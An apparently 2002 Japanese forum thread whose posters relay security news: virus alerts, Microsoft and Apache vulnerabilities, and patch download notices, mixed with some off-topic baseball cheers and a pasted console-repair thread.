提供されます。この情報を適用し生起される結果のリスクは利用者が負うものとし、株式会社
ラックは一切の責任を負わないものとします。

再配布について:

このアドバイザリの再配布は、下記条件を満たす限り自由です。

発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
66 ◆MUMUMU4w :02/03/19 05:45 ID:naXTlD7l
ちょっと古いけど、一応。

■マイクロソフト、セキュリティパッチのふりをする偽装ウイルスについて警告 --
http://www.forest.impress.co.jp/article/2002/03/18/msvirusinfo.html

 マイクロソフト(株)は、3月に入ってセキュリティパッチのふりをしたトロイの
木馬型ウイルスが蔓延しているのを受け、ユーザーに対し注意を呼びかける案内を掲
載した。同社では、ユーザーに対して実行可能形式のファイルを添付したメールを送
信することは一切ないとし、メールに添付された実行形式のファイルを安易に実行し
ないように注意を呼びかけている。

 今回マイクロソフトが注意を呼びかけているのは、“Fbound”“Gibe”“Sharpei”
と呼ばれる3つのトロイの木馬型ウイルス。それぞれ“Patch.exe” “q216309.exe”
“MS02-010.exe”という、マイクロソフトのセキュリティパッチを模した実行ファ
イルが添付されている。いずれもメールを受信したり表示するだけで感染することは
なく、添付されたファイルをユーザーが実行することではじめて感染する。ところが、
“Re:重要”“Re:資料”といった日本語の件名が付けられていたり、送信者がマイク
ロソフトや知人のメールアドレスになっていることがあるため、安全なファイルと誤
解して実行し、感染してしまうケースが増えている。感染すると、Outlookのアドレ
ス帳などを元にメールアドレスを収集し、同様のウイルスメールを勝手に送信する。

 マイクロソフトでは、修正プログラムの案内メールをユーザーに対し送信すること
はあっても、修正プログラムを含め実行形式のファイルを添付してユーザーに送信す
ることは「一切ない」とし、たとえ知人から送られてきたメールであっても実行形式
の添付ファイルを安易に実行しないよう注意を呼びかけている。

□Microsoft セキュリティ
http://www.microsoft.com/japan/security/
□ウイルス対策ソフトで検出できない
「WORM_JAPANIZE.A」の感染が拡大中(Broadband Watch)
http://www.watch.impress.co.jp/broadband/news/2002/03/14/virus.htm
□シマンテック、ウイルス「W32.Gibe@mm」の危険度を引き上げ(Broadband Watch)
http://www.watch.impress.co.jp/broadband/news/2002/03/12/gibe.htm
67 ◆AVGxGcmM :02/03/19 06:05 ID:X3Jw66b0
>>65
同じ内容でセキュ板にスレ立ててからこのスレの存在と65に書いてあるのを見つけました。
今後気を付けます。
スマソ。
68 ◆VS.OwYC. :02/03/19 06:11 ID:xrgQC1B/
じぶんもきをつけるから
ひーかんにんして
69 ◆MUMUMU4w :02/03/20 08:19 ID:R1bHffdy
「zLib」の脆弱性はマイクロソフト製品にも影響(2002年3月19日14時30分更新)

 Linuxのネットワーク関連コンポーネントとして知られている「zLib」に、ハッカーからの攻撃に
対する脆弱性の存在することが先週公表されたが、このライブラリはLinuxなどのUNIX系
ソフトウェアにとどまらず、Windowsを含めたその他のソフトウェアにも広範に利用されている
実態が、その後の調査で判明した。

 脆弱性の影響を受けるソフトウェアとして、DirectX 8、FrontPage、GDI+、Internet Explorer、
Office、NetShow、Train Simulator、Visual Studio、Windows Messangerなどのマイクロソフト
製品を列挙した「zLib」の著作者は、さらにNetscape Navigator、Network Associates PGP
Security、Symantec Norton Antivirus、Jasc PaintShop Proなどの製品もその影響下にあると
説明している。

 またこの「zLib」は、埋め込み型ソフトウェアでも利用されているため、各ベンダーから提供
されているソフトウェアパッチを対象のソフトウェアに適用するよう強く勧告されている。

ソース: http://www.computernews.com/DailyNews/20020319143090E79774.htm
70 ◆MUMUMU4w :02/03/21 13:20 ID:8ii2DaZs
Microsoft warns of another Java security hole

SAN FRANCISCO, California (Reuters) -- Microsoft Corp. has released a bulletin
advising of a second vulnerability in software that allows Windows users to run
programs written in Java, a Microsoft program manager said Tuesday.

ソース: http://www.cnn.com/2002/TECH/internet/03/20/java.security.reut/index.html

ちょっと日本語の情報探してみます。今日は休日だから出てないかも。
71 ◆MUMUMU4w :02/03/21 13:27 ID:8ii2DaZs
>>70
ロイター(英語)の情報。
Excite翻訳によると、
> 第2の脆弱は、ユーザのコンピューター上で制限されたエリアの外で走る悪意のある
> Javaプログラムを許可するでしょう。
ということらしいです。

UPDATE 1-Microsoft warns of 2nd Java security hole in Windows

(Updates sixth paragraph to clarify that first vulnerability only affects proxy server
users, not second vulnerability)

SAN FRANCISCO, March 20 (Reuters) - Microsoft Corp. MSFT.O has released a bulletin
advising of a second vulnerability in software that allows Windows users to run programs
written in Java, a Microsoft program manager said on Tuesday.

Microsoft and Sun Microsystems Inc. SUNW.O , creator of the Java programming language,
released a joint bulletin about the first vulnerability affecting the Java Virtual Machine
code on March 4. They released a subsequent bulletin on Monday, according to Christopher
Budd, security program at the Microsoft Security Response Center.

Both vulnerabilities were rated "critical" because of the harm they could cause, however
there have been no known attempts to exploit the vulnerabilities, he said.

An update to Microsoft's Java Virtual Machine released on March 4 fixes both
vulnerabilities, Budd added.

The first vulnerability could allow a malicious Java applet on a Web site to monitor a
visitor's Web surfing until the browser window is closed. The second vulnerability would
allow a malicious Java program to run outside a restricted area on a users' computer.

For the first vulnerability, users are only at risk if they go through a proxy server to
access Web sites as is common in corporations but not homes. Proxy servers are
commonly used to cache content on frequently accessed Web sites, housing it on a
server closer to the end user so that the downloading is faster.
72 ◆MUMUMU4w :02/03/21 13:28 ID:???
>>71
ロイターのソースのURL忘れた。スマソ。
http://www.reuters.com/news_article.jhtml?type=search&StoryID=724816
73名無しさん@お腹いっぱい。:02/03/22 23:36 ID:YEejVcUW
>>71
う〜ん、英語っすか?
う〜ん・・・

◆MUMUMU4wさん、ごくろうさんです
74名無しさん@お腹いっぱい。:02/03/22 23:57 ID:???
>>65の脆弱性に関して
まだ正式発表がMSからなされていないそうですが。
情報の出所は伏せておきます。 但し個人ではないことを伝えておきます。
まだ完全に検証された情報ではないそうです。
1.この脆弱性はメディアプレーヤーがそのOSに対応した最新のものであれば回避される可能性がある
(検証作業は終わっていないそうです)
2.IE6に限定される問題なのかは未検証だそうです。
3.正式にコメントがいつできるかはその情報源の部署では分からないそうです。
この件に関しては情報源の某企業でも脆弱性の存在は認識していますが、
上記の検証が十分でない為各自ラックさんの情報等も参照しながら、
自己の責任で判断してください
75名無しさん@お腹いっぱい。:02/03/23 04:35 ID:???
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━

● WORM_MYLIFE.B(マイライフB) ※危険度「中」
● WORM_SHREW.A(シリュー) ※危険度「低」
● WORM_YAHA.B(ヤハ) ※危険度「低」

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

●オーストラリア・ニュージーランド地域で流行中、危険度「中」
○ウイルス名: WORM_MYLIFE.B(マイライフB)
○危険度:中
○対応パターンファイル:248以降 ※1
○ウイルス活動:
メールの添付ファイルで広まります。
76 ◆MUMUMU4w :02/03/23 10:51 ID:ZTQMxqP1
>>70 >>71 の日本語の情報出ました。Windows用の新しいパッチは出ない模様。

マイクロソフト 新たなJava脆弱性を公表(2002年3月22日13時20分更新)
 全社一丸となってソフトウェアの脆弱性に関する自社製品の総点検を行っているマイクロ
ソフトは、先日発表したJVM(Java Vertual Machine)の脆弱性に続き、新たな脆弱性が
Javaに存在することを公表した。

 この脆弱性は、プロキシサーバーを利用している場合に、不審なJavaプログラムが、
Windows上のJVMが管理するメモリ領域を超えて活動することを許してしまう可能性が
存在するというもの。3月4日にマイクロソフトから発表されたパッチには、これへの対処が
すでに含まれており、またこの脆弱性を突いたクラッカーからの攻撃の発生は、まだ一件も
報告されていないとしている。

ソース: http://www.computernews.com/DailyNews/20020322132090E79774.htm
77IE 6に影響を与える重大なセキュリティホール:02/03/23 13:36 ID:6D921VRq
既に各サイトで報道されているとおり,マイクロソフトのInternet Explorer(IE)6に新たなセキュリティホールが発見されている。

この問題は,悪意あるサイトを訪問すると,ユーザーの意思にかかわらず,つまりダイアログボックス表示による確認なしにファイルが
自動的にダウンロードされ,さらに自動的に実行されてしまうというもの。影響が及ぶのはIE 6のみで,それ以前のバージョンには問題はない。

だがこの問題は,現在マイクロソフトより提供されているパッチやサービスパックなどをすべて適用していても防ぐことはできないという。
この問題を発見し,アドバイザリを公開したラックでは,Windows 2000 ProfessionalやWindows NT 4.0 Workstation,Windows 98の
各プラットフォームで,現在提供されているすべてのパッチやサービスパック,セキュリティロールアップパッケージを適用した状態で,
問題が再現されたことを確認した。


http://www.zdnet.co.jp/enterprise/0203/22/02032201.html
78IE 6に影響を与える重大なセキュリティホール (2):02/03/23 13:38 ID:6D921VRq
問題の発見者であるラックの新井悠氏によると,この問題の原因は「スクリプトやActiveXとは関係ない」ところにあるという。
ただ,3月22日18時時点でもなおこの問題に対するパッチが提供されていないことから,それ以上の詳細を公開することは差し控えている。

 同氏はZDNetからのメールに答え,この問題が与える影響として「ウイルスやワームの感染手段として利用される恐れが挙げられる」
としている。つまり,ユーザーは攻撃者が仕掛けたサイトにアクセスしただけで,知らず知らずのうちにウイルスやワーム,
さらにはトロイの木馬に代表される悪意あるプログラムを仕掛けられる恐れがある。

79名無しさん@お腹いっぱい。:02/03/23 17:51 ID:ThTD51cQ
WindowsのJVMってMicrosoftが作ってんの? Sun?
80名無しさん@お腹いっぱい。:02/03/24 22:50 ID:???
>>79
両方あるよ
81 ◆MUMUMU4w :02/03/26 18:41 ID:mzcq6o+U
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━

● VBS_LEE.D(リー)
日本語(ローマ字)で送られてくるVBSワーム、対応パターン250以降

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

●「konnichiwa」の件名で来るVBSワーム
○ウイルス名: VBS_LEE.D(リー)
○危険度:低
○対応パターンファイル:250以降 ※1
○ウイルス活動:
メールの添付ファイルとチャットシステムのIRCで広まります。メールの場
合、内容は次のとおりです。

――――――――――――――――――――
件名:konnichiwa

本文:konnichiwa kono syashin mite ne!!!!!!

添付ファイル名:syashin2.jpg.vbs
――――――――――――――――――――
※日本語(ローマ字)で、写真画像をよそおっています。うっかり添付ファ
イルを開かないようご注意ください。

添付ファイルを実行すると感染し、以下の活動を行います。

・Microsoft Outlookのアドレス帳全員に上記のメールを送信
・mIRC使用時、参加したチャットルーム内の全員にウイルスを送信
・Internet Explorerのホームページ設定をアダルトページに変更

○予防法:
このウイルスは送信するメールの件名、本文、添付ファイル名が決まってい
ます。該当のメールの添付ファイルを実行しないようにしてください。
Microsoft Outlookがインストールされていると、アドレス帳に登録されて
いる宛先すべてにメールを自動送信しますので、とくに注意が必要です。

マイクロソフトの「Windowsスクリプティングホスト」(WSH)がインストール
されている環境で動作します。必要のない場合、WSHを削除しておくという
予防法もあります。

#ご参考(Windows Scripting Host(WSH)あるいはVBSの機能を無効にする)
http://www.trendmicro.co.jp/virusinfo/basic/winsecurity/winsec1.asp

<トレンドマイクロ製品をお使いの方>
トレンドマイクロ製品では、本ウイルスに対しパターンファイル250以降で
対応します。添付ファイル名が固定のため、「InterScan eManager」で該当
のメールをブロックすることも有効です。
今後新たな亜種の発生も考えられるため、お使いの製品のパターンファイル
等は最新の状態でお使いください。

○「VBS_LEE.D」を検出した場合:
特に自動起動などのシステム改変は行いませんので特別な手順は必要ありま
せん。検出したファイルはすべて削除してください。
Internet Explorerのホームページが変更されてしまった場合には手動で
Internet Explorerの設定をやり直してください。

○ VBS_LEE.D 詳細情報:
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_LEE.D
82 ◆MUMUMU4w :02/03/28 00:33 ID:IGNQScFH
■「Apache」のWindows版に深刻なセキュリティホール -------------------------
http://www.forest.impress.co.jp/article/2002/03/27/apachebug.html

 フリーのWebサーバーとして広く普及している「Apache」のWindows版に任意のコマン
ドを実行される危険性のある深刻なセキュリティホールが見つかり、The Apache
Software Foundationは、この問題を修正したv1.3.24を公開した。Windows 95/98/Me/
NT 4.0/2000/XPで動作するフリーソフトで、現在The Apache Software Foundationの
サイトからダウンロードできる。

 今回発見されたセキュリティホールは、「Apache」のWindows版で、CGIディレクト
リなどに拡張子“.bat”や“.cmd”のバッチファイルをおいておくと、悪意ある閲覧
者が不正なURLを使ってアクセスすることで、「Apache」が動作しているマシン上で
任意のコマンドを実行できてしまうというもの。問題の対象となるのは「Apache」の
v1.3.23以前のバージョンで、v1.3.24ではこの問題は修正されているとのこと。

 また、現在ベータテストが進められている「Apache」v2.0のWindows版にも同様の
問題が見つかり、同サイトではWindows版の公開を見合わせている。この問題の発見
者によると、特に「Apache」v2.0.28以前のバージョンではインストール時に拡張子
“.bat”のファイルがCGIディレクトリに作成されるため、初期状態のまま利用して
いると攻撃を受ける可能性が高いという。「Apache」v2.0での問題は、近日公開され
る次のベータ版で修正される予定とのこと。

 「Apache」は、Windows版のほかUNIX版やMacOS版などさまざまなプラットフォーム
向けのバージョンが公開されているフリーのWebサーバー。オープンソースで開発が
進められ、さまざまな機能を追加するアドオンモジュールも公開されているため、現
在もっとも広く使われているWebサーバーといわれている。

□Apache HTTPD Project - The Apache HTTP Server Project
http://httpd.apache.org/
□Windows版のダウンロード
http://www.apache.org/dist/httpd/binaries/win32/
83 ◆MUMUMU4w :02/03/29 11:59 ID:YrHWWdpU
■IEの新パッチがリリース
----------------------------------------------------------------------
MS02-015 に関する情報
「MS02-015 : 2002年3月28日 Internet Explorer 用の累積的な修正プログラ
ム」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの入手方法をご案内いたします。

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-005 : 2002 年 2 月 11 日 Internet Explorer 用の累
積的な修正プログラム
http://www.microsoft.com/japan/technet/security/bulletin/ms02-005.asp
で修正された問題に加えて、新たに 2 つの問題を排除します。

対象となる製品
==============
・ Internet Explorer 6
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.5 Service Pack 1
・ Internet Explorer 5.01 Service Pack 2 (WWindows 2000 、Windows NT
4.0 に組み込まれているもののみ)

注意: Internet Explorer 5.01 Service Pack 2 の修正プログラムは、
Windows 2000 、Windows NT4.0 Service Pack 6a 環境でのみ適用可能です。

修正プログラム
==============
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/secpac26/6/W98NT42KMeXP/JA/q319182.exe
・ Internet Explorer 5.5 SP2 and Internet Tools
http://download.microsoft.com/download/ie55sp2/secpac26/5.5_sp2/WIN98Me/JA/q319182.exe
・ Internet Explorer 5.5 SP1 and Internet Tools
http://download.microsoft.com/download/ie55sp1/secpac26/5.5_sp1/WIN98Me/JA/q319182.exe
・ Internet Explorer 5.01 SP2 (Windows 2000、Windows NT4.0 Service
Pack 6a)
http://download.microsoft.com/download/ie501sp2/secpac26/5.01_sp2/W982KNT4/JA/q319182.exe

詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによ
る以下の攻撃を防ぐことができます。

(高) Internet Explorer のゾーン判定を回避して、不正なゾーンでスクリプ
トを実行することができます。
(中) 悪意のあるユーザーが指定したプログラムを自動的に実行することがで
きます。

(中略)
日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
MS02-015: 28 March 2002 Cumulative Patch for Internet Explorer
http://www.microsoft.com/technet/security/bulletin/ms02-015.asp
84名無しさん@お腹いっぱい。:02/03/29 21:25 ID:3PUvG7HV
う〜ん
新しいパッチですか・・・
もう、何がどうなってんのか分からん。
困ったもんだ。
85 ◆MUMUMU4w :02/03/29 22:18 ID:YrHWWdpU
>>83 >>84
今日付の毎日DIGITAL Todayの記事を載せておきます。このパッチは重要なので
必ず当てておく必要があるようです。

■セキュリティーパッチ/IE用にMSが公開
 マイクロソフトは28日、インターネットエクスプローラー(IE)6などのセキュリティーホール
対策用のパッチを公開した。インターネットなどを介して、悪意のあるユーザーが任意に指定
したプログラムを自動的に実行できる問題などを防ぐ。

 このセキュリティーホールを利用すると、意図しないアプリケーションが実行されてハード
ディスクがフォーマットされたり、任意のファイルを読み取られたり、ウィンドウズが異常停止
する可能性があるという。

 対象バージョンはIEの6、5.5SP2、5.5SP1、5.01SP2。同社のホームページで「MS02-015:
2002年3月28日Internet Explorer用の累積的な修正プログラム」の情報として掲載されて
いるが、29日現在、詳細情報は英語版のみで、日本語版は準備中。

ソース: http://www.mainichi.co.jp/digital/internet/200203/29/07back.html
86 ◆MUMUMU4w :02/03/29 22:19 ID:YrHWWdpU
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━

● VBS_VBSWG.D(ブイビーエスダブリュジー)
日本語(ローマ字)で送られてくるVBSワーム、パターンファイル252以降

##下記のウイルスはすでに発見されているものですが、パターンファイル
250以前で対応できない亜種が見つかりました##
● VBS_LEE.D(リー)
● WORM_BYMER.A(バイマー)
亜種に対応するにはパターンファイル252以降が必要です。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

●「konnichiwa」の件名で来るVBSワーム
○ウイルス名: VBS_VBSWG.D(ブイビーエスダブリュジー)
○危険度:低
○対応パターンファイル:252以降 ※1
○ウイルス活動:
VBS_LEE.Dとは表面上の活動に違いはありません。内部のコードが異なりま
す。

メールの添付ファイルとチャットシステムのIRCで広まります。メールの場
合、内容は次のとおりです。

――――――――――――――――――――
件名:konnichiwa

本文:konnichiwa kono syashin mite ne!!!!!!

添付ファイル名:syashin2.jpg.vbs
――――――――――――――――――――
※日本語(ローマ字)で、写真画像をよそおっています。うっかり添付ファ
イルを開かないようご注意ください。

添付ファイルを実行すると感染し、以下の活動を行います。

・Microsoft Outlookのアドレス帳全員に上記のメールを送信
・mIRC使用時、参加したチャットルーム内の全員にウイルスを送信
・Internet Explorerのホームページ設定をアダルトページに変更

○予防法:
このウイルスは送信するメールの件名、本文、添付ファイル名が決まってい
ます。該当のメールの添付ファイルを実行しないようにしてください。
Microsoft Outlookがインストールされていると、アドレス帳に登録されて
いる宛先すべてにメールを自動送信しますので、とくに注意が必要です。

マイクロソフトの「Windowsスクリプティングホスト」(WSH)がインストール
されている環境で動作します。必要のない場合、WSHを削除しておくという
予防法もあります。

#ご参考(Windows Scripting Host(WSH)あるいはVBSの機能を無効にする)
http://www.trendmicro.co.jp/virusinfo/basic/winsecurity/winsec1.asp
87名無しさん@お腹いっぱい。:02/03/30 11:48 ID:h73ib3uD
こんなにパッチ当ててると
PCって○○してくるなぁと思ふ
88名無しさん@お腹いっぱい。:02/03/30 19:08 ID:???
4/1にI・Eに重大なセキュリティ・ホール発見のスレたてられても
ウソだといえる自信が無いぞ
89名無しさん@お腹いっぱい。:02/03/31 03:14 ID:nHprOeGq
ちょっとまて、5.01SP2はwin98にパッチ出さないつもりか?

おい、マイクソ!
貴様は世界最大手のOS屋なんだろ!
さっさと全OS用のパッチおながいします。
90名無しさん@お腹いっぱい。:02/03/31 03:24 ID:GfAhBDK4
▼ N64ソフトについて TAKA 02/3/25(月) 18:34
分解したいなら買え (・∀・) 02/3/25(月) 21:31
掲示板での口調 エンドー 02/3/26(火) 1:06
Re:掲示板での口調 (・∀・) 02/3/26(火) 11:40
---------------------------------------------------
N64ソフトについて
TAKA - 02/3/25(月) 18:34 -
--------------------------------------------------
N64ソフトを分解したことがある人に聞きたいのですがあの
ネジをはずせるドライバーとはどのような物なのですか。詳しく
教えてください。
--------------------------------------------------
分解したいなら買え
(・∀・) - 02/3/25(月) 21:31 -
---------------------------------------------------
http://www.murauchi-hobby.com/cgi-bin/cargo.cgi?mode=search&frame=&Category=0&keyword=3911036
っていうかこれしかないだろ。
ちなみに、分解したら故障しても任天堂の保障は効きません。
--------------------------------------------------
掲示板での口調
エンドー - 02/3/26(火) 1:06 -
--------------------------------------------------
下のツリーにある「ゴルァ」もそうですけど、普通の口調で
書き込めないですか?せっかく6角ドライバの入手方法のレスを
付けてるのに、余計な悪印象を与えるのは勿体ないですよ。
---------------------------------------------------
Re:掲示板での口調
(・∀・) - 02/3/26(火) 11:40 -
----------------------------------------------------
そうですね。
91 ◆MUMUMU4w :02/04/02 19:10 ID:iSWg5QiI
IEなどのXMLHTTPコントロールに関するセキュリティ問題の修正プログラムが公開
「MSXML」の各バージョン用の修正プログラムをダウンロード可能
(02/04/02)

 マイクロソフト(株)は2日、IE 6などに搭載されている「Microsoft XML Core Services(MSXML)」
にセキュリティ上の脆弱性があり、ローカルファイルを読み取られる危険性があるとされる問題で、
この問題を修正するための修正プログラムを公開した。「MSXML」は、Windows XPや「Internet
Explorer」v6、「Microsoft SQL Server 2000」に同梱されているため、同社ではこれらの製品を
利用しているユーザーは直ちに修正プログラムを適用するよう推奨している。

 この問題は、「MSXML」の“XMLHTTP”と呼ばれるコンポーネントが、「Internet Explorer」の
セキュリティゾーン設定に基づいた動作をしないために、悪意あるWebサイトを閲覧しただけで
ユーザーのローカルファイルを読み取られてしまう危険性があるというもの。

 同社によると、「MSXML」はWindows XP、「Internet Explorer」v6、「Microsoft SQL Server 2000」
にあらかじめ同梱されているほか、市販のアプリケーションのセットアップ時に自動的に
インストールされることもあるとのこと。自分の環境に「MSXML」がインストールされているか
確認する最善の方法は、Widowsのシステムディレクトリに「MSXML」の関連ファイルがあるか
確認することだという。

 具体的には“C:\Windows\system32\”または“C:\Winnt\system32\”に、“MSXML2.DLL”と
いうファイルがあれば「MSXML」v2.6が、“MSXML3.DLL”というファイルがあれば「MSXML」v3.0が、
“MSXML4.DLL”というファイルがあれば「MSXML」v4.0がインストールされていることになる。
修正プログラムは「MSXML」のバージョンごとに別々のファイルで公開されており、複数の
バージョンの「MSXML」がインストールされている場合は、それぞれ対応する修正プログラムを
適用しておく必要がある。

□XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる(MS02-008)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-008.asp

ソース: http://www.forest.impress.co.jp/article/2002/04/02/xmlcoreservicepatch.html

XML 2.x と 3.x のパッチが公開されました。(XML 4.x用のパッチは以前から公開)
私の環境(WinXP Pro)では、XML2/3/4 すべてのパッチを適用する必要がありました。

C:\WINNT\System32 (XP Home editionでは C:\WINDOWS\System32)で、
MSXML という名前でファイル名検索すると、どのパッチが必要かわかるようです。
92 ◆MUMUMU4w :02/04/03 00:59 ID:ftHPmmpT
■OfficeXPにクロスアプリケーションスクリプティングの脆弱性か?

 マイクロソフトのOfficeXPに、クロスアプリケーションスクリプティングとも呼べる脆弱性が
発見された。

 この問題は、Georgi Guninski security advisoryに投稿されたメーリングリストにより分かった
もので、二つの脆弱性を利用した物。

 一つ目の問題は、HTMLメールに含まれるオブジェクトとスクリプトが、メールへの返信、
転送によって実行されてしまうという物。二つ目の問題は、スプレッドシートのコンポーネントに
バグが存在し、一つ目の問題を併用することで、任意のファイルを作成できてしまう問題である。

 これらの問題により、*.htaファイルのような実行型ファイルの作成も可能となる。そのため、
マシンの管理権限などの奪取や、ファイルの閲覧/改竄などが行われる可能性があるとのことだ。

 なお、投稿者によると、この問題を3月17日にマイクロソフトへ報告しているが、3月31日現在も
返事が返ってきていない。

Georgi Guninski security advisory #53
More Office XP problems
http://www.guninski.com/m$oxp-2.html

(詳しくはScan および Scan Daily EXpress 本誌をご覧ください)
http://shop.vagabond.co.jp/m-ssw01.shtml
http://shop.vagabond.co.jp/m-sdx01.shtml

ソース: https://www.netsecurity.ne.jp/article/1/4612.html
93 ◆MUMUMU4w :02/04/05 13:53 ID:mFn43yZY
■新規セキュリティパッチ。
ただしServerプロダクト用なので、一般の人はほとんど対象外でしょう。(◆MUMUMU4w)

http://www.microsoft.com/japan/technet/security/bulletin/ms02-016ov.asp

MS02-016 に関する情報
「MS02-016: Q318593: 読み取り専用アクセスのグループポリシー ファイルを
開くと、ポリシーの適用が妨害される」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題により、グループポリシーの適用を阻害される可能性があります。

対象となる製品
==============
・ Microsoft Windows Advanced Server
・ Microsoft Windows Server
・ Microsoft Windows 2000 Datacenter Server

修正プログラム
==============
・ Microsoft Windows 2000 (PC/AT 互換機)
http://download.microsoft.com/download/win2000platform/Patch/Q318593/NT5/JA/Q318593_W2K_SP3_X86_JA.exe
・ Microsoft Windows 2000 (NEC PC-9800シリーズ)
http://download.microsoft.com/download/win2000platform/PatchNEC/Q318593/NT5/JA/Q318593_W2K_SP3_nec98_JA.exe

詳細
====
この問題を利用して、下記の攻撃が考えられます。

(中) 悪意のあるユーザーが、グループポリシーの適用を阻害することができます。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を利用した悪影響を受けるこ
とがあります。グループポリシーは、通常、管理者が設定したルールを、各個
人が使用するコンピュータに適用するための仕組みです。
このグループポリシーの適用が阻害されることで、管理者が新しいルールを
作成した場合でも、各個人が使用するコンピュータにでは、以前の古いルール
がそのまま使われる可能性あり、以下のような実害を受ける可能性があります。

・ 管理者が意図したルールでグループ内が統一されなくなります。
・ 管理者が禁止したい事項がある場合にも、適用できない場合があります。

しかし、このセキュリティ問題は、グループポリシーを変更することは
できません。

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
94名無しさん@お腹いっぱい。:02/04/05 14:54 ID:???
自動アップデートでMS02-17の修正がダウンロードされた、ページは
まだ出来てないらしい。
95名無しさん@お腹いっぱい。:02/04/05 16:52 ID:pjwgBC81
>>94
ページできたよ
でも
Windows 2000 Professional/Server/Advanced Server の PC/AT 互換機用修正プログラムは現在準備中です。準備ができ次第、このページにて、お知らせします。

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-017ov.asp
96 ◆MUMUMU4w :02/04/05 19:39 ID:mFn43yZY
>>94 >>95
ということで、出しておきます。NT4/2000/XPに適用が必要。

MS02-017 に関する情報
「MS02-017: Q311967 : Multiple UNC Provider の未チェックのバッファに
よりコードが実行される」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、未チェックのバッファにより不正なプログラムが実行される
可能性および、本来与えられている以上の権限を得ることができるというもの
です。最悪の場合、悪意のあるユーザーが攻撃の対象となるシステムで、ほと
んど制限を受けることのない権限(Local System)で任意のプログラムを実行す
ることが可能になります。

対象となる製品
==============
・ Microsoft Windows NT 4.0 Workstation
・ Microsoft Windows NT 4.0 Server
・ Microsoft Windows NT 4.0 Server, Enterprise Edition
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000 Professional
・ Microsoft Windows 2000 Server
・ Microsoft Windows 2000 Advanced Server
・ Microsoft Windows XP

修正プログラム
==============
・ Microsoft Windows NT 4.0 Workstation/Server/Server, Enterprise
Edition
・ PC/AT 互換機
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37630
Select Language で Japanese Language Version を選択してください。
・ NEC PC-9800シリーズ
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37630
Select Language で Japanese NEC Language Version を選択してくださ
い。
・ Microsoft Windows NT 4.0 Terminal Server Edition
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37652
Select Language で Japanese Language Version を選択してください。
・ Microsoft Windows 2000 Professional/Server/Advanced Server
・ NEC PC-9800シリーズ
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37555
Select Language で Japanese NEC を選択してください。
・ Microsoft Windows XP
http://www.microsoft.com/downloads/release.asp?ReleaseID=37588&area=search&ordinal=4
・ Microsoft Windows XP 64-bit Edition
http://www.microsoft.com/downloads/release.asp?ReleaseID=37674&area=search&ordinal=1

Windows 2000 Professional/Server/Advanced Server の PC/AT 互換機用修正
プログラムは現在準備中です。準備ができ次第、このページにて、お知らせし
ます。
97 ◆MUMUMU4w :02/04/05 21:31 ID:mFn43yZY
■Slashdot Japanの記事

■ MS02-015パッチは機能していない?
k3c 曰く、 "マイクロソフトからMS02-015としてIEの累積的な修正プログラムがリリース
されましたが、情報筋によれば、このパッチを当てたあとでも脆弱性をついたexploitの
サンプルが機能するようです(The Register記事、jscript.dk及びBugTraqへの投稿)。
ワタシもexploitを試してみましたが、パッチ済みのマシンでもバッチリとファイルの中身を
表示されてしまいました。追試求む。"

ソース: http://slashdot.jp/article.pl?sid=02/04/04/0343230
98名無しさん@お腹いっぱい。:02/04/05 21:51 ID:0fe7V3qN
          阪神ワッショイ!!
      \\  阪神ワッショイ!! //
  +   + \\ 阪神ワッショイ!!/+
                             +
   +    ⌒*⌒  ⌒*⌒   ⌒*⌒
      ( ´∀`∩(´∀`∩)( ´∀`)
 +  (( (つ   ノ(つ  丿(つ  つ  +
       ヽ  ( ノ ( ヽノ  ) ) )
       (_)し' し(_) (_)_)
99 ◆MUMUMU4w :02/04/05 21:58 ID:mFn43yZY
■件名が日本語の『Fbound』ウイルスが猛威,対策ソフトへの過信は禁物―IPA

 情報処理振興事業協会(IPA)セキュリティセンターは4月4日,2002年3月のコンピ
ューター・ウイルス届け出状況を公開した。ウイルスの発見届け出は1460件で,その
うち実際に被害に遭ったのは153件。同センターでは,届け出件数が急増している
「Fbound」ウイルスを特に警告するとともに,「対策ソフトを過信することなく,不用意な
添付ファイルは実行しない」ことを改めて呼びかけている。

ソース: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020404/1/
100100:02/04/05 23:17 ID:QX+d3cNu
100
101名無しさん@お腹いっぱい。:02/04/06 00:15 ID:wklHbnOW

        阪神連勝ワッショイ!!
     \\  阪神連勝ワッショイ!! //
 +   + \\ 阪神連勝ワッショイ!!/+
                            +
.   +   /■\  /■\  /■\  +
      ( ´∀`∩(´∀`∩)( ´∀`)
 +  (( (つ   ノ(つ  丿(つ  つ ))  +
       ヽ  ( ノ ( ヽノ  ) ) )
       (_)し' し(_) (_)_)

♪〜 負ける巨人に男の情け、負けてやりたい助〜けてみた〜い。そいつが
出来ない野球のつらさ〜 俺の俺の俺の心に無情の虎が〜(無情の虎が)
情け無用と吼えるのさ あっそれ 勝った勝った勝った勝った阪神阪神
